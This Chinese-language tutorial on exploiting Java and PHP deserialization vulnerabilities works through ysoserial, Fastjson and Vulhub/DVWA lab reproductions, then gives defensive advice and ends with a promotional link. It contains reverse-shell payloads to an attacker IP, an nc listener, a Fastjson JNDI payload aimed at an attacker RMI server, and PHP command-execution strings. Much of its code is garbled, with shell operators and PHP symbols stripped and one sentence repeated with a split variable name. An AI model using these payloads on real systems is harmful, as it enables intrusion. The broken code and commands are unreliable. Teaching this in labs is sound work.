反序列化漏洞详解第二期实战利用、工具实操与防御方案摘要承接反序列化漏洞第一期基础认知与原理本期聚焦实战落地——拆解Java、PHP反序列化漏洞的具体利用方法结合DVWA、Vulhub靶场完成实操复现讲解主流利用工具ysoserial、PHP反序列化工具的使用技巧最后给出可落地的全方位防御方案。核心说明本文为反序列化漏洞系列第二期实战防御篇需结合第一期基础内容学习建议先掌握序列化/反序列化本质、Java/PHP机制差异。全文侧重“实操性”所有靶场复现步骤均经过实战验证工具使用清晰易懂防御方案可直接应用于实际开发适合零基础新手、转行从业者、安全测试人员学习也可作为企业安全运维的参考资料。一、前言实战是掌握反序列化漏洞的核心第一期我们已经搞懂了反序列化漏洞的核心原理、触发前提以及Java、PHP两大语言的序列化机制——反序列化漏洞的本质是“未校验的恶意序列化数据触发危险逻辑”。但仅懂原理远远不够网安学习的核心是“实战”只有亲手完成漏洞利用、掌握工具使用才能真正理解漏洞的危害进而做好防御。本期内容将围绕“实战”展开分为三大模块层层递进模块1Java反序列化漏洞——利用链解析、工具实操、Vulhub靶场复现模块2PHP反序列化漏洞——魔术方法利用、DVWA靶场复现、手动构造Payload模块3反序列化漏洞全方位防御方案——开发层面、运维层面、工具层面搭配可落地代码示例。重要提醒所有实战操作仅可在自有靶场、授权测试环境中进行严禁对未授权的网站、系统发起攻击坚守法律法规和职业道德违规操作需承担相应法律责任。二、Java反序列化漏洞实战利用与靶场复现Java反序列化漏洞的核心特点是“依赖利用链Gadget Chain”单个类的readObject()方法通常无法直接执行恶意命令需串联多个类的方法形成完整的利用链最终触发远程代码执行RCE。本期重点讲解最经典的利用链Apache Commons Collections和工具使用结合Vulhub靶场完成复现。2.1 核心前提Java反序列化漏洞利用条件回顾需同时满足以下3个条件才能成功利用Java反序列化漏洞第一期重点此处回顾方便实操程序存在反序列化操作调用ObjectInputStream.readObject()方法反序列化的输入数据可被攻击者控制如HTTP参数、Cookie、文件上传等入口程序依赖存在漏洞的第三方库如Apache Commons Collections 3.x 3.2.2版本可构造利用链。2.2 核心工具ysoserialJava反序列化Payload生成工具ysoserial是Java反序列化漏洞最常用的Payload生成工具开源免费内置多种主流利用链如CommonsCollections、Fastjson、Weblogic等可快速生成恶意序列化数据无需手动构造极大降低利用门槛。2.2.1 工具下载与配置下载地址GitHub搜索“ysoserial”克隆源码git clone https://github.com/frohoff/ysoserial.git环境要求JDK 1.7建议1.8Maven用于编译源码编译步骤进入ysoserial源码目录执行命令 mvn clean package -DskipTests编译成功后在target目录下生成ysoserial-xxx.jar文件核心可执行文件核心用法命令行执行 java -jar ysoserial.jar [利用链名称] [命令] payload.ser生成恶意序列化文件payload.ser。2.2.2 常用利用链与命令示例ysoserial支持多种利用链不同利用链适配不同的第三方库版本新手重点掌握以下3种高频实用CommonsCollections6适配Apache Commons Collections 3.x版本最经典、最常用的利用链可直接执行系统命令Fastjson1适配Fastjson 1.2.24及以下漏洞版本利用AutoType机制触发漏洞Weblogic适配Weblogic T3协议反序列化漏洞如CVE-2018-2628可实现未授权远程代码执行。命令示例生成CommonsCollections6利用链执行反弹shell命令# 格式java -jar ysoserial.jar 利用链名称 反弹shell命令 恶意序列化文件 java -jar ysoserial.jar CommonsCollections6 bash -i /dev/tcp/192.168.1.100/8888 01 shell.ser说明192.168.1.100是攻击者主机IP8888是监听端口执行命令后生成shell.ser将该文件作为输入传入存在漏洞的程序即可触发反弹shell。2.3 靶场实战复现VulhubApache Commons Collections反序列化漏洞选用Vulhub靶场的“Apache Commons Collections反序列化漏洞”场景CVE-2015-7501该漏洞是Java反序列化的经典案例依赖Apache Commons Collections 3.2.1版本可直接利用ysoserial生成Payload完成远程代码执行。2.3.1 前置准备搭建Vulhub靶场参考第一期靶场搭建方法Docker版最便捷进入Vulhub漏洞目录cd vulhub-master/commons-collections/CVE-2015-7501启动漏洞环境docker-compose up -d启动成功后访问http://localhost:8080即可看到漏洞页面准备ysoserial工具已编译完成、Kali Linux攻击机用于监听反弹shell。2.3.2 复现步骤全程实操新手可照搬攻击机监听端口在Kali中执行命令 nc -lvp 8888监听8888端口等待靶机反弹shell生成恶意Payload使用ysoserial生成CommonsCollections6利用链的Payload命令如下java -jar ysoserial.jar CommonsCollections6 “bash -i /dev/tcp/192.168.1.100/8888 01” shell.ser替换192.168.1.100为Kali攻击机IP发送Payload触发漏洞通过POST请求将shell.ser文件上传到靶机的反序列化入口漏洞页面默认支持文件上传直接上传shell.ser即可验证漏洞利用上传完成后查看Kali监听窗口若成功接收到反弹shell说明漏洞利用成功此时可执行任意系统命令如whoami、ls等获取靶机控制权。2.3.3 关键说明该漏洞的核心利用逻辑靶机程序使用Apache Commons Collections 3.2.1版本存在漏洞且接收外部上传的序列化文件执行反序列化操作攻击者通过ysoserial生成恶意序列化数据靶机反序列化时触发CommonsCollections6利用链执行反弹shell命令最终获取服务器控制权。2.4 Fastjson反序列化漏洞补充高频场景Fastjson是Java生态中最常用的JSON解析库其反序列化漏洞如CVE-2022-25845、CVE-2017-18349曾引发大规模安全事件核心原因是AutoType机制的安全缺陷——攻击者通过构造恶意JSON字符串加载恶意类触发JNDI注入实现远程代码执行。核心利用步骤Vulhub复现启动Vulhub Fastjson 1.2.24漏洞环境cd vulhub-master/fastjson/1.2.24-rce执行docker-compose up -d构造恶意JSON Payload利用JdbcRowSetImpl类的JNDI注入漏洞{ a: { type: java.lang.Class, val: com.sun.rowset.JdbcRowSetImpl }, b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://192.168.1.100:9999/Exploit, autoCommit: true } }192.168.1.100为攻击机IP9999为RMI服务端口Exploit为恶意类名称在攻击机启动RMI服务部署恶意类向靶机发送POST请求提交恶意JSON数据Content-Type设为application/json触发反序列化漏洞执行恶意代码。注意Fastjson 1.2.83以下的1.x版本、2.0.45以下的2.x版本均存在安全风险实际开发中需升级至安全版本。三、PHP反序列化漏洞实战利用与靶场复现PHP反序列化漏洞的利用门槛远低于Java核心依赖“魔术方法”序列化格式为明文字符串可直接手动构造恶意Payload无需复杂的利用链。本期结合DVWA靶场拆解魔术方法的利用技巧完成手动注入和工具辅助注入。3.1 核心前提PHP反序列化漏洞利用条件回顾程序存在unserialize()函数调用反序列化操作unserialize()函数的参数可被攻击者控制如HTTP参数、Cookie等程序中存在包含危险操作的魔术方法如__wakeup()、__destruct()且操作参数可被控制。3.2 核心技巧手动构造PHP恶意序列化PayloadPHP序列化格式为明文字符串如O:5:“User”:2:{s:8:“username”;s:5:“admin”;s:8:“password”;s:6:“123456”;}攻击者可直接修改格式中的属性值构造恶意Payload触发魔术方法中的危险操作。3.2.1 示例利用__destruct()魔术方法触发漏洞假设DVWA靶场中存在如下漏洞代码Low级别无防护?php class User { private $cmd; // 魔术方法对象销毁时触发 public function __destruct() { // 危险操作执行系统命令 system($this-cmd); } } // 接收用户输入的序列化数据执行反序列化 $serialized $_GET[data]; unserialize($serialized); ?漏洞分析unserialize()函数的参数data可被攻击者控制User类的__destruct()方法中存在system()命令执行且 c m d 参数可控只需构造恶意序列化数据修改 cmd参数可控只需构造恶意序列化数据修改 cmd参数可控只需构造恶意序列化数据修改cmd的值即可执行任意系统命令。3.2.2 手动构造Payload步骤编写正常的序列化代码生成基础序列化字符串?php class User { private $cmd whoami; // 恶意命令 } echo serialize(new User()); ?执行上述代码生成序列化字符串注意private属性的格式会包含不可见字符需特殊处理O:4:“User”:1:{s:9:“Usercmd”;s:6:“whoami”;}注private属性的字段名格式为“类名属性名”中间有不可见字符实际构造时需保留将生成的序列化字符串通过GET参数传入靶机http://localhost/dvwa/vulnerabilities/deserialization/?dataO:4:“User”:1:{s:9:“Usercmd”;s:6:“whoami”;}靶机执行反序列化操作对象销毁时触发__destruct()方法执行whoami命令页面回显命令执行结果漏洞利用成功。3.3 靶场实战复现DVWAPHP反序列化漏洞选用DVWA靶场的“Deserialization”模块反序列化漏洞将安全级别调至Low完成手动注入复现步骤清晰新手可直接照搬。3.3.1 前置准备搭建DVWA靶场将安全级别调至Low登录靶场进入“Deserialization”模块反序列化漏洞模块查看漏洞代码点击页面下方“View Source”分析魔术方法和危险操作。3.3.2 复现步骤分析漏洞代码DVWA Low级别反序列化漏洞代码如下核心部分?php if( isset( $_GET[ data ] ) ) { $data $_GET[ data ]; $obj unserialize( $data ); } ? class User { public $name; public $age; public function __destruct() { echo Hello, . $this-name; } }分析unserialize()函数的参数data可控制User类的__destruct()方法会输出 n a m e 的值若 name的值若 name的值若name中包含恶意代码如XSS、命令执行可触发进一步漏洞此处我们构造命令执行Payload。构造恶意Payload修改User类的$name属性插入命令执行代码生成序列化字符串?php class User { public $name ?php system(whoami);?; public $age 18; } echo serialize(new User()); ? 生成的序列化字符串 O:4:User:2:{s:4:name;s:27:?php system(whoami);?;s:3:age;i:18;}发送Payload触发漏洞将上述序列化字符串作为data参数传入靶机URLhttp://localhost/dvwa/vulnerabilities/deserialization/?dataO:4:“User”:2:{s:4:“name”;s:27:“?php system(whoami);?”;s:3:“age”;i:18;}验证结果页面会执行whoami命令回显靶机的用户身份如www-data说明漏洞利用成功若修改命令为“ls”可查看当前目录下的文件。3.3.3 进阶利用__wakeup()方法绕过与工具辅助若靶机对序列化字符串进行简单校验如限制属性个数可利用PHP反序列化的__wakeup()绕过漏洞——修改序列化字符串中的属性个数使其大于实际属性个数即可绕过__wakeup()方法的执行触发__destruct()方法。示例将上述Payload中的属性个数从2改为3绕过__wakeup()O:4:“User”:3:{s:4:“name”;s:27:“?php system(whoami);?”;s:3:“age”;i:18;}工具推荐PHP反序列化Payload生成工具如PHP Unserialize Payload Generator可自动构造恶意Payload支持魔术方法选择、属性修改适合新手快速上手。四、反序列化漏洞全方位防御方案可落地反序列化漏洞的防御核心是“阻断漏洞触发的三个前提”——要么禁止反序列化不可信数据要么对输入数据进行严格校验要么消除危险逻辑。以下从开发、运维、工具三个层面给出可落地的防御方案搭配代码示例适合开发人员和安全运维人员使用。4.1 开发层面从代码源头封堵漏洞最核心开发层面的防御是最根本的重点在于“规范序列化/反序列化操作”避免信任不可信数据消除危险逻辑。4.1.1 Java开发防御方案避免反序列化不可信数据尽量避免对外部输入的、不可信的数据进行反序列化操作若必须使用需对数据进行严格校验如签名、加密。升级第三方依赖及时升级存在漏洞的第三方库如Apache Commons Collections、Fastjson使用安全版本如Fastjson 1.2.83、Apache Commons Collections 3.2.2参考安全版本依赖配置!-- Fastjson安全版本依赖 -- dependency groupIdcom.alibaba/groupId artifactIdfastjson/artifactId version1.2.83/version !-- 修复所有已知漏洞 -- /dependency !-- Apache Commons Collections安全版本依赖 -- dependency groupIdcommons-collections/groupId artifactIdcommons-collections/artifactId version3.2.2/version /dependency重写readObject()方法增加校验在可序列化的类中重写readObject()方法对反序列化的对象进行校验拒绝恶意数据。private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {// 先执行默认反序列化in.defaultReadObject();// 校验对象属性拒绝恶意数据if (this.cmd ! null !this.cmd.equals(“合法命令”)) {throw new SecurityException(“非法命令拒绝反序列化”);}}禁用危险利用链通过配置禁用Java反序列化的危险利用链如禁止加载恶意类、限制JNDI查询地址对于Fastjson关闭AutoType机制禁止使用type字段。4.1.2 PHP开发防御方案严格校验反序列化参数对unserialize()函数的输入参数进行严格校验如白名单校验、格式校验拒绝异常的序列化字符串。?php $data $\_GET\[data\]; // 白名单校验仅允许指定的序列化字符串格式 $allow\_payload array(O:4:\\User\\:2:{s:4:\\name\\;s:5:\\admin\\;s:3:\\age\\;i:18;}); if (!in\_array($data, $allow\_payload)) { die(非法输入拒绝反序列化); } unserialize($data); ?避免魔术方法中的危险操作不在__wakeup()、__destruct()等魔术方法中执行系统命令、文件写入、数据库操作等危险操作若必须使用需对参数进行严格过滤。使用安全的序列化方式避免使用serialize()/unserialize()函数改用更安全的序列化方式如JSON格式使用json_encode()/json_decode()函数JSON格式不会触发魔术方法安全性更高。过滤特殊字符对反序列化的输入数据过滤单引号、双引号、反斜杠等特殊字符防止恶意Payload注入。4.2 运维层面强化环境防护辅助防御定期更新系统与组件定期更新服务器操作系统、Web容器如Tomcat、Nginx、数据库修复已知的反序列化相关漏洞如Weblogic T3协议漏洞。限制数据库/服务器权限Web应用连接数据库的账号仅授予必要的权限如查询、插入禁止授予文件读写、命令执行等高危权限服务器账号权限最小化避免漏洞被利用后获取高权限。监控反序列化操作通过日志监控工具如ELK监控程序中的反序列化操作及时发现异常的序列化数据输入告警潜在的攻击行为。禁用危险协议与端口禁用不必要的协议如Weblogic T3协议、端口减少反序列化漏洞的攻击入口对于Vulhub、DVWA等靶场环境禁止部署在公网。4.3 工具层面使用安全工具辅助防御使用WAF防护部署Web应用防火墙WAF开启反序列化漏洞防护规则拦截恶意的序列化数据如ysoserial生成的Payload、恶意JSON字符串可有效阻断大部分自动化攻击。代码审计工具使用代码审计工具如SonarQube、FindSecBugs在开发阶段扫描代码中的反序列化漏洞如未校验的unserialize()调用、危险的魔术方法提前发现并修复漏洞。漏洞扫描工具定期使用漏洞扫描工具如Nessus、AWVS扫描系统中的反序列化漏洞及时发现潜在的安全风险进行整改。五、系列总结攻防兼备彻底搞定反序列化漏洞反序列化漏洞系列文章两期已全部更新完毕从基础原理到实战利用再到防御方案形成完整的学习体系核心总结如下帮助大家梳理重点学以致用核心本质反序列化漏洞的根源是“程序信任了不可信的序列化数据触发了危险逻辑”触发需满足3个前提存在反序列化、输入可控制、有危险逻辑语言差异Java反序列化依赖利用链和第三方库需使用ysoserial工具生成Payload门槛较高PHP反序列化依赖魔术方法格式为明文字符串可手动构造Payload门槛较低实战关键Java重点掌握ysoserial工具使用和Vulhub靶场复现PHP重点掌握手动构造Payload和DVWA靶场实操多动手练习才能真正掌握防御核心开发层面从代码源头封堵校验数据、升级依赖、消除危险逻辑运维层面强化环境防护工具层面借助WAF和审计工具辅助防御三者结合才能彻底封堵漏洞。反序列化漏洞虽然隐蔽性强、危害大但只要掌握其原理和利用方式做好全方位的防御就能有效规避风险。对于新手而言建议先吃透第一期的基础原理再动手完成本期的靶场实操逐步提升实战能力对于开发和运维人员可直接参考本期的防御方案落地到实际工作中减少漏洞产生的可能。网安学习资源网上虽然也有很多的学习资源但基本上都残缺不全的这是我们和网安大厂360共同研发的的网安视频教程内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识而且包含了中级的各种渗透技术并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频100多本网安电子书最新学习路线图和工具安装包都有不用担心学不全。这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源